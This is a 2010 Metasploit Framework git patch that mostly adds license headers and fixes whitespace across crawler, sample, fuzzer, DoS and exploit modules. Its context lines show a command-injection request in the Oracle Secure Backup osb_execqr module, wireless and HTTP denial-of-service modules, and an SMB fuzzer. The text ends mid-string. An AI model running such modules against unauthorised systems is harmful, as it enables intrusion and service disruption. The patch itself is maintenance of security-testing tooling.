From 0e72894e583d3a64c993cda90ffb25c2efb77686 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Mon, 3 May 2010 17:13:09 +0000 Subject: [PATCH] more cleanups git-svn-id: file:///home/svn/framework3/trunk@9212 4d416f70-5f16-0410-b530-b9f4589650da --- data/msfcrawler/basic.rb | 31 +- data/msfcrawler/flash.rb | 54 ++-- data/msfcrawler/forms.rb | 53 ++-- data/msfcrawler/objects.rb | 27 +- data/msfcrawler/scripts.rb | 29 +- .../samples/framework/dump_module_info.rb | 4 + .../samples/framework/encode_file.rb | 4 + .../samples/framework/enumerate_modules.rb | 4 + .../framework/run_exploit_using_base.rb | 4 + .../framework/run_exploit_using_core.rb | 4 + .../samples/modules/auxiliary/sample.rb | 7 +- .../samples/modules/encoders/sample.rb | 17 +- .../samples/modules/exploits/sample.rb | 20 +- documentation/samples/modules/nops/sample.rb | 11 + .../modules/payloads/singles/sample.rb | 15 +- .../admin/http/tomcat_administration.rb | 5 +- .../auxiliary/admin/motorola/wr850g_cred.rb | 13 +- modules/auxiliary/admin/oracle/oracle_sql.rb | 2 +- modules/auxiliary/admin/oracle/osb_execqr.rb | 12 +- modules/auxiliary/dos/wifi/cts_rts_flood.rb | 10 +- modules/auxiliary/dos/wifi/file2air.rb | 17 +- .../auxiliary/dos/wifi/netgear_ma521_rates.rb | 4 +- .../auxiliary/dos/wifi/netgear_wg311pci.rb | 9 +- .../dos/windows/http/pi3web_isapi.rb | 17 +- .../fuzzers/smb/smb2_negotiate_corrupt.rb | 24 +- .../auxiliary/fuzzers/smb/smb_create_pipe.rb | 18 +- .../fuzzers/smb/smb_create_pipe_corrupt.rb | 38 +-- .../fuzzers/smb/smb_negotiate_corrupt.rb | 24 +- .../fuzzers/smb/smb_ntlm1_login_corrupt.rb | 36 +-- .../auxiliary/fuzzers/ssh/ssh_version_15.rb | 26 +- .../auxiliary/fuzzers/ssh/ssh_version_2.rb | 26 +- .../fuzzers/ssh/ssh_version_corrupt.rb | 26 +- .../fuzzers/tds/tds_login_corrupt.rb | 62 ++-- .../fuzzers/tds/tds_login_username.rb | 60 ++-- modules/auxiliary/gather/dns_enum.rb | 35 ++- .../gather/search_email_collector.rb | 28 +- .../scanner/backdoor/energizer_duo_detect.rb | 6 +- .../auxiliary/scanner/dect/call_scanner.rb | 26 +- .../auxiliary/scanner/dect/station_scanner.rb | 32 ++- .../auxiliary/scanner/finger/finger_users.rb | 6 +- modules/auxiliary/scanner/ftp/ftp_version.rb | 6 +- modules/auxiliary/scanner/http/cert.rb | 5 +- .../auxiliary/scanner/http/enum_delicious.rb | 10 +- .../auxiliary/scanner/http/enum_wayback.rb | 2 +- .../http/ms09_020_webdav_unicode_bypass.rb | 11 +- modules/auxiliary/scanner/http/options.rb | 7 +- modules/auxiliary/scanner/http/sqlmap.rb | 15 +- modules/auxiliary/scanner/http/ssl.rb | 4 +- modules/auxiliary/scanner/http/svn_scanner.rb | 8 +- modules/auxiliary/scanner/http/trace_axd.rb | 4 +- modules/auxiliary/scanner/http/web_vulndb.rb | 7 +- .../auxiliary/scanner/imap/imap_version.rb | 4 + .../scanner/misc/sunrpc_portmapper.rb | 9 +- modules/auxiliary/scanner/nfs/nfsmount.rb | 6 +- .../auxiliary/scanner/oracle/xdb_sid_brute.rb | 2 +- .../auxiliary/scanner/pop3/pop3_version.rb | 4 + .../auxiliary/scanner/smtp/smtp_version.rb | 4 + .../scanner/telnet/telnet_version.rb | 6 +- modules/auxiliary/scanner/x11/open_x11.rb | 6 +- modules/auxiliary/server/capture/ftp.rb | 7 +- modules/auxiliary/server/capture/http_ntlm.rb | 2 + modules/auxiliary/server/capture/telnet.rb | 11 + modules/auxiliary/server/file_autopwn.rb | 4 +- .../auxiliary/spoof/dns/bailiwicked_domain.rb | 1 - .../auxiliary/spoof/dns/compare_results.rb | 70 +++-- .../sqli/oracle/dbms_cdc_publish2.rb | 2 +- .../sqli/oracle/dbms_export_extension.rb | 2 +- .../auxiliary/sqli/oracle/jvm_os_code_10g.rb | 15 +- .../auxiliary/sqli/oracle/jvm_os_code_11g.rb | 15 +- modules/encoders/x86/alpha_mixed.rb | 8 +- .../exploits/multi/fileformat/maple_maplet.rb | 6 +- .../multi/ftp/wuftpd_site_exec_format.rb | 1 + .../wireshark_lwres_getaddrbyname_loop.rb | 5 +- .../osx/rtsp/quicktime_rtsp_content_type.rb | 3 + .../exploits/solaris/sunrpc/ypupdated_exec.rb | 11 +- .../unix/webapp/guestbook_ssi_exec.rb | 4 +- .../windows/backdoor/energizer_duo_payload.rb | 14 +- .../windows/browser/adobe_jbig2decode.rb | 31 +- .../windows/browser/adobe_utilprintf.rb | 20 +- .../windows/browser/ms09_043_owc_msdso.rb | 42 +-- .../browser/zenturiprogramchecker_unsafe.rb | 2 +- .../windows/fileformat/adobe_jbig2decode.rb | 16 +- .../windows/fileformat/mediajukebox.rb | 11 +- .../windows/fileformat/mymp3player_m3u.rb | 4 +- .../windows/ftp/vermillion_ftpd_port.rb | 1 + .../windows/http/bea_weblogic_jsessionid.rb | 1 + .../http/bea_weblogic_transfer_encoding.rb | 1 + .../exploits/windows/http/hp_nnm_ovwebhelp.rb | 2 +- .../windows/http/httpdx_handlepeer.rb | 1 + .../windows/http/httpdx_tolog_format.rb | 1 + modules/payloads/singles/linux/x86/chmod.rb | 12 +- modules/payloads/singles/linux/x86/exec.rb | 2 - modules/payloads/singles/windows/exec.rb | 2 - modules/payloads/stagers/osx/x86/bind_tcp.rb | 11 + modules/payloads/stages/netware/shell.rb | 4 + .../payloads/stages/osx/x86/bundleinject.rb | 2 - modules/payloads/stages/windows/dllinject.rb | 13 +- .../stages/windows/patchupdllinject.rb | 4 +- modules/payloads/stages/windows/vncinject.rb | 11 + .../payloads/stages/windows/x64/vncinject.rb | 10 +- msfcli | 38 +-- msfconsole | 8 +- msfd | 4 + msfelfscan | 4 +- msfencode | 4 + msfgui | 4 + msfmachscan | 4 + msfopcode | 4 + msfpayload | 4 + msfpescan | 4 + msfrpc | 8 +- msfrpcd | 10 +- msfweb | 4 + plugins/auto_add_route.rb | 5 + plugins/db_credcollect.rb | 7 + plugins/db_mysql.rb | 4 + plugins/db_postgres.rb | 4 + plugins/db_sqlite2.rb | 4 + plugins/db_sqlite3.rb | 4 + plugins/db_tracker.rb | 19 +- plugins/db_wmap.rb | 33 ++- plugins/event_tester.rb | 4 + plugins/ips_filter.rb | 25 +- plugins/msfd.rb | 4 + plugins/nexpose.rb | 4 + plugins/pcap_log.rb | 16 +- plugins/sample.rb | 11 +- plugins/session_tagger.rb | 5 + plugins/socket_logger.rb | 25 +- plugins/sounds.rb | 5 + plugins/thread.rb | 19 +- plugins/token_hunter.rb | 5 + plugins/xmlrpc.rb | 38 +-- scripts/meterpreter/checkvm.rb | 6 +- scripts/meterpreter/getcountermeasure.rb | 26 +- scripts/meterpreter/getgui.rb | 4 +- scripts/meterpreter/gettelnet.rb | 4 +- scripts/meterpreter/hostsedit.rb | 4 +- scripts/meterpreter/killav.rb | 4 +- scripts/meterpreter/migrate.rb | 4 +- scripts/meterpreter/multi_console_command.rb | 13 +- scripts/meterpreter/multicommand.rb | 2 +- scripts/meterpreter/multiscript.rb | 4 +- scripts/meterpreter/netenum.rb | 4 +- scripts/meterpreter/prefetchtool.rb | 24 +- scripts/meterpreter/remotewinenum.rb | 10 +- scripts/meterpreter/search_dwld.rb | 6 +- scripts/meterpreter/winbf.rb | 22 +- scripts/meterpreter/winenum.rb | 6 +- test/tests/03_range_walker_test.rb | 12 +- tools/convert_31.rb | 10 +- tools/exe2vba.rb | 4 + tools/exe2vbs.rb | 4 + tools/find_badchars.rb | 4 + tools/halflm_second.rb | 4 + tools/import_webscarab.rb | 68 ++--- tools/lm2ntcrack.rb | 4 + tools/metasm_shell.rb | 5 + tools/module_author.rb | 11 +- tools/module_license.rb | 10 +- tools/module_ports.rb | 4 + tools/module_reference.rb | 4 + tools/module_targets.rb | 2 + tools/msf_irb_shell.rb | 4 + tools/msfcrawler.rb | 265 +++++++++--------- tools/msfproxy.rb | 171 +++++------ tools/nasm_shell.rb | 4 + tools/pattern_create.rb | 6 +- tools/pattern_offset.rb | 2 + 169 files changed, 1487 insertions(+), 946 deletions(-) diff --git a/data/msfcrawler/basic.rb b/data/msfcrawler/basic.rb index 9bc3ee0f26..cf32fdf09f 100644 --- a/data/msfcrawler/basic.rb +++ b/data/msfcrawler/basic.rb @@ -1,3 +1,16 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +# $Revision$ + require 'rubygems' require 'pathname' require 'hpricot' @@ -6,28 +19,28 @@ require 'uri' class CrawlerSimple < BaseParser def parse(request,result) - + if !result['Content-Type'].include? "text/html" return end - + doc = Hpricot(result.body.to_s) doc.search('a').each do |link| - + hr = link.attributes['href'] - - if hr and !hr.match(/^(\#|javascript\:)/) + + if hr and !hr.match(/^(\#|javascript\:)/) begin - hreq = urltohash('GET',hr,request['uri'],nil) - + hreq = urltohash('GET',hr,request['uri'],nil) + insertnewpath(hreq) - + rescue URI::InvalidURIError #puts "Parse error" #puts "Error: #{link[0]}" end end end - end + end end diff --git a/data/msfcrawler/flash.rb b/data/msfcrawler/flash.rb index 52d3a83b7d..334316f0b5 100644 --- a/data/msfcrawler/flash.rb +++ b/data/msfcrawler/flash.rb @@ -1,8 +1,20 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +# $Revision$ + require 'rubygems' require 'pathname' require 'uri' - $flarebinary = "/home/et/Downloads/flare" $flareoutdir = "/home/et/Downloads/" @@ -13,52 +25,52 @@ class CrawlerFlash < BaseParser rexp = ['loadMovieNum\(\'(.*?)\'', 'loadMovie\(\'(.*?)\'', 'getURL\(\'(.*?)\'' - ] + ] + - if !result['Content-Type'].include? "application/x-shockwave-flash" return end - + outswf = File.join($flareoutdir,request['uri'].gsub(/\//,'_')) - - puts "Downloading SWF file to: #{outswf}" - - ffile = File.new(outswf, "wb") + + puts "Downloading SWF file to: #{outswf}" + + ffile = File.new(outswf, "wb") ffile.puts(result.body) - ffile.close + ffile.close system("#{$flarebinary} #{outswf}") - + outflr = outswf.gsub('.swf','.flr') - + if File.exists?(outflr) - puts "Decompiled SWF file to: #{outflr}" + puts "Decompiled SWF file to: #{outflr}" else puts "Error: Decompilation failed." return end - + File.open(outflr, "r") do |infile| while (line = infile.gets) - rexp.each do |r| - links = line.to_s.scan(Regexp.new(r,true)) #" - links.each do |link| - + rexp.each do |r| + links = line.to_s.scan(Regexp.new(r,true)) #" + links.each do |link| + begin hreq = urltohash('GET',link[0],request['uri'],nil) insertnewpath(hreq) - + rescue URI::InvalidURIError #puts "Parse error" #puts "Error: #{link[0]}" end - end + end end end - end - end + end + end end diff --git a/data/msfcrawler/forms.rb b/data/msfcrawler/forms.rb index 7590b38f77..9be3852daf 100644 --- a/data/msfcrawler/forms.rb +++ b/data/msfcrawler/forms.rb @@ -1,3 +1,16 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +# $Revision$ + require 'rubygems' require 'pathname' require 'hpricot' @@ -6,11 +19,11 @@ require 'uri' class CrawlerForms < BaseParser def parse(request,result) - + if !result['Content-Type'].include? "text/html" return end - + hr = '' m = '' @@ -21,44 +34,44 @@ class CrawlerForms < BaseParser fname = f.attributes['name'] if fname.empty? fname = "NONE" - end + end m = "GET" if !f.attributes['method'].empty? m = f.attributes['method'].upcase end - - #puts "Parsing form name: #{fname} (#{m})" - + + #puts "Parsing form name: #{fname} (#{m})" + htmlform = Hpricot(f.inner_html) - + arrdata = [] - + htmlform.search('input').each do |p| #puts p.attributes['name'] #puts p.attributes['type'] #puts p.attributes['value'] - - #raw_request has uri_encoding disabled as it encodes '='. - arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value'])) + + #raw_request has uri_encoding disabled as it encodes '='. + arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value'])) end - + data = arrdata.join("&").to_s - - + + begin hreq = urltohash(m,hr,request['uri'],data) - + hreq['ctype'] = 'application/x-www-form-urlencoded' - + insertnewpath(hreq) - - + + rescue URI::InvalidURIError #puts "Parse error" #puts "Error: #{link[0]}" end - end - end + end + end end diff --git a/data/msfcrawler/objects.rb b/data/msfcrawler/objects.rb index 4a9e0011e6..86b66d05be 100644 --- a/data/msfcrawler/objects.rb +++ b/data/msfcrawler/objects.rb @@ -1,3 +1,16 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +# $Revision$ + require 'rubygems' require 'pathname' require 'hpricot' @@ -6,11 +19,11 @@ require 'uri' class CrawlerObjects < BaseParser def parse(request,result) - + if !result['Content-Type'].include? "text/html" return end - + hr = '' m = '' @@ -21,15 +34,15 @@ class CrawlerObjects < BaseParser begin hreq = urltohash('GET',s,request['uri'],nil) - + insertnewpath(hreq) - - + + rescue URI::InvalidURIError #puts "Parse error" #puts "Error: #{link[0]}" end - end - end + end + end end diff --git a/data/msfcrawler/scripts.rb b/data/msfcrawler/scripts.rb index 78c81fb1b2..e5a043f400 100644 --- a/data/msfcrawler/scripts.rb +++ b/data/msfcrawler/scripts.rb @@ -1,3 +1,16 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +# $Revision$ + require 'rubygems' require 'pathname' require 'hpricot' @@ -6,11 +19,11 @@ require 'uri' class CrawlerScripts < BaseParser def parse(request,result) - + if !result['Content-Type'].include? "text/html" return end - + hr = '' m = '' @@ -20,16 +33,16 @@ class CrawlerScripts < BaseParser s = obj['src'] begin - hreq = urltohash('GET',s,request['uri'],nil) - + hreq = urltohash('GET',s,request['uri'],nil) + insertnewpath(hreq) - - + + rescue URI::InvalidURIError #puts "Parse error" #puts "Error: #{link[0]}" end - end - end + end + end end diff --git a/documentation/samples/framework/dump_module_info.rb b/documentation/samples/framework/dump_module_info.rb index cd7153cb6c..432baa4b51 100755 --- a/documentation/samples/framework/dump_module_info.rb +++ b/documentation/samples/framework/dump_module_info.rb @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This sample demonstrates how a module's information can be easily serialized # to a readable format. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib')) diff --git a/documentation/samples/framework/encode_file.rb b/documentation/samples/framework/encode_file.rb index b6a492b90c..70bf79e7d8 100755 --- a/documentation/samples/framework/encode_file.rb +++ b/documentation/samples/framework/encode_file.rb @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This sample demonstrates how a file can be encoded using a framework # encoder. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib')) diff --git a/documentation/samples/framework/enumerate_modules.rb b/documentation/samples/framework/enumerate_modules.rb index 3f07ae0a39..903a918040 100755 --- a/documentation/samples/framework/enumerate_modules.rb +++ b/documentation/samples/framework/enumerate_modules.rb @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This sample demonstrates enumerating all of the modules in the framework and # displays their module type and reference name. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib')) diff --git a/documentation/samples/framework/run_exploit_using_base.rb b/documentation/samples/framework/run_exploit_using_base.rb index 2608b3e00c..0a6f2a6b8b 100755 --- a/documentation/samples/framework/run_exploit_using_base.rb +++ b/documentation/samples/framework/run_exploit_using_base.rb @@ -1,9 +1,13 @@ #!/usr/bin/env ruby # +# $Id$ +# # This sample demonstrates using the framework core directly to launch an # exploit. It makes use of the simplified exploit wrapper method provided by # the Msf::Simple::Exploit mixin. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib')) diff --git a/documentation/samples/framework/run_exploit_using_core.rb b/documentation/samples/framework/run_exploit_using_core.rb index cfc0284894..731aaac3c9 100755 --- a/documentation/samples/framework/run_exploit_using_core.rb +++ b/documentation/samples/framework/run_exploit_using_core.rb @@ -1,10 +1,14 @@ #!/usr/bin/env ruby # +# $Id$ +# # This sample demonstrates using the framework core directly to launch an # exploit. It uses the framework base Framework class so that the # distribution module path is automatically set, but relies strictly on # framework core classes for everything else. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib')) diff --git a/documentation/samples/modules/auxiliary/sample.rb b/documentation/samples/modules/auxiliary/sample.rb index b81d1fbcbe..c652322e97 100644 --- a/documentation/samples/modules/auxiliary/sample.rb +++ b/documentation/samples/modules/auxiliary/sample.rb @@ -1,15 +1,14 @@ ## -# $Id: test.rb 4419 2007-02-18 00:10:39Z hdm $ +# $Id$ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## - require 'msf/core' module Msf @@ -49,7 +48,7 @@ class Auxiliary::Sample < Msf::Auxiliary def cmd_aux_extra_command(*args) print_status("Running inside aux_extra_command()") end - + end end diff --git a/documentation/samples/modules/encoders/sample.rb b/documentation/samples/modules/encoders/sample.rb index d8789b2f68..b6db400593 100644 --- a/documentation/samples/modules/encoders/sample.rb +++ b/documentation/samples/modules/encoders/sample.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + module Msf module Encoders @@ -28,7 +39,7 @@ class Sample < Msf::Encoder buf end -end - -end +end + +end end diff --git a/documentation/samples/modules/exploits/sample.rb b/documentation/samples/modules/exploits/sample.rb index 45ed39c04b..11be9e5a73 100644 --- a/documentation/samples/modules/exploits/sample.rb +++ b/documentation/samples/modules/exploits/sample.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' module Msf @@ -19,20 +30,23 @@ class Exploits::Sample < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Sample exploit', 'Description' => %q{ - This exploit module illustrates how a vulnerability could be exploited + This exploit module illustrates how a vulnerability could be exploited in an TCP server that has a parsing bug. }, 'Author' => 'skape', 'Version' => '$Revision$', + 'References' => + [ + ], 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", }, - 'Targets' => + 'Targets' => [ # Target 0: Windows All - [ + [ 'Windows Universal', { 'Platform' => 'win', diff --git a/documentation/samples/modules/nops/sample.rb b/documentation/samples/modules/nops/sample.rb index 944f04588a..f9aadf17da 100644 --- a/documentation/samples/modules/nops/sample.rb +++ b/documentation/samples/modules/nops/sample.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' module Msf diff --git a/documentation/samples/modules/payloads/singles/sample.rb b/documentation/samples/modules/payloads/singles/sample.rb index 5af0f5e5ae..bb7686175b 100644 --- a/documentation/samples/modules/payloads/singles/sample.rb +++ b/documentation/samples/modules/payloads/singles/sample.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' module Msf @@ -30,6 +41,6 @@ module Sample end -end -end +end +end end diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index 5932dc4614..87de9cd3f9 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -5,7 +9,6 @@ # http://metasploit.com/framework/ ## - require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/admin/motorola/wr850g_cred.rb b/modules/auxiliary/admin/motorola/wr850g_cred.rb index e17a4fdcd7..28e721185a 100644 --- a/modules/auxiliary/admin/motorola/wr850g_cred.rb +++ b/modules/auxiliary/admin/motorola/wr850g_cred.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -8,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Motorola WR850G v4.03 Credentials', 'Description' => %q{ - Login credentials to the Motorola WR850G router with + Login credentials to the Motorola WR850G router with firmware v4.03 can be obtained via a simple GET request if issued while the administrator is logged in. A lot more information is available through this request, but diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index 9a4f328df5..ea710f3236 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 7688 $', + 'Version' => '$Revision$', 'References' => [ [ 'URL', 'https://www.metasploit.com/users/mc' ], diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb index 4b32b266cd..6673e97254 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -44,14 +48,14 @@ class Metasploit3 < Msf::Auxiliary cmd = datastore['CMD'] uri = "/login.php?clear=no&ora_osb_lcookie=&ora_osb_bgcookie=#{r}&button=Logout&rbtool=" - + req = uri + Rex::Text.uri_encode(cmd) - + print_status("Sending command: #{datastore['CMD']}...") res = send_request_raw({'uri' => req,},5) - + print_status("Done.") - + end end diff --git a/modules/auxiliary/dos/wifi/cts_rts_flood.rb b/modules/auxiliary/dos/wifi/cts_rts_flood.rb index 19ebd19de3..55e7aab0c2 100644 --- a/modules/auxiliary/dos/wifi/cts_rts_flood.rb +++ b/modules/auxiliary/dos/wifi/cts_rts_flood.rb @@ -20,14 +20,14 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Wireless CTS/RTS Flooder', 'Description' => %q{ - This module sends 802.11 CTS/RTS requests to a specific wireless peer, - using the specified source address, - }, - + This module sends 802.11 CTS/RTS requests to a specific wireless peer, + using the specified source address, + }, 'Author' => [ 'Brad Antoniewicz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' - )) + )) + register_options( [ OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]), diff --git a/modules/auxiliary/dos/wifi/file2air.rb b/modules/auxiliary/dos/wifi/file2air.rb index 5061dba47b..2fcd2ec19f 100644 --- a/modules/auxiliary/dos/wifi/file2air.rb +++ b/modules/auxiliary/dos/wifi/file2air.rb @@ -1,15 +1,26 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Dos - + def initialize(info = {}) super(update_info(info, 'Name' => 'Wireless Frame (File) Injector', 'Description' => %q{ - Inspired by Josh Wright's file2air, this module writes + Inspired by Josh Wright's file2air, this module writes wireless frames from a binary file to the air, allowing you to substitute some addresses before it gets sent. Unlike the original file2air (currently v1.1), this module @@ -62,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary end close_wifi - end + end def substaddrs(frame) tods = (frame[1] & 1) == 1 diff --git a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb index 6fe2377082..278c3c9b4e 100644 --- a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb +++ b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 @@ -35,8 +33,8 @@ class Metasploit3 < Msf::Auxiliary with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. }, - 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module + 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb index 6384db1961..a8c2ac4f6d 100644 --- a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb +++ b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 @@ -32,18 +30,17 @@ class Metasploit3 < Msf::Auxiliary This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. - }, - 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module + 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => - [ + [ ['CVE', '2006-6125'], ['OSVDB', '30511'], ['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'], ['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'], - ] + ] )) register_options( [ diff --git a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb index 05f600f16a..ac43bb5fb8 100644 --- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb +++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb @@ -1,12 +1,23 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Pi3Web <=2.0.13 ISAPI DoS', 'Description' => %q{ The Pi3Web HTTP server crashes when a request is made @@ -39,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Request sent to #{rhost}:#{rport}") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_status("Couldn't connect to #{rhost}:#{rport}") - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end end end diff --git a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb index eea2da254f..7f031cf29d 100644 --- a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SMB Negotiate SMB2 Dialect Corruption', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test']) ], self.class) end - + def do_smb_negotiate(pkt,opts={}) @connected = false connect @@ -41,27 +41,27 @@ class Metasploit3 < Msf::Auxiliary sock.put(pkt) sock.get_once(-1, opts[:timeout]) end - + def run last_str = nil last_inp = nil last_err = nil - + pkt = make_smb_negotiate cnt = 0 - + max = datastore['MAXDEPTH'].to_i max = nil if max == 0 tot = ( max ? [max,pkt.length].min : pkt.length) * 256 - + print_status("Fuzzing SMB negotiate packet with #{tot} requests") fuzz_string_corrupt_byte_reverse(pkt,max) do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}") end - + begin r = do_smb_negotiate(str, 0.25) rescue ::Interrupt @@ -72,21 +72,21 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + last_str = str last_inp = @last_fuzzer_input end end - + def make_smb_negotiate # The SMB 2 dialect must be there dialects = ['PC NETWORK 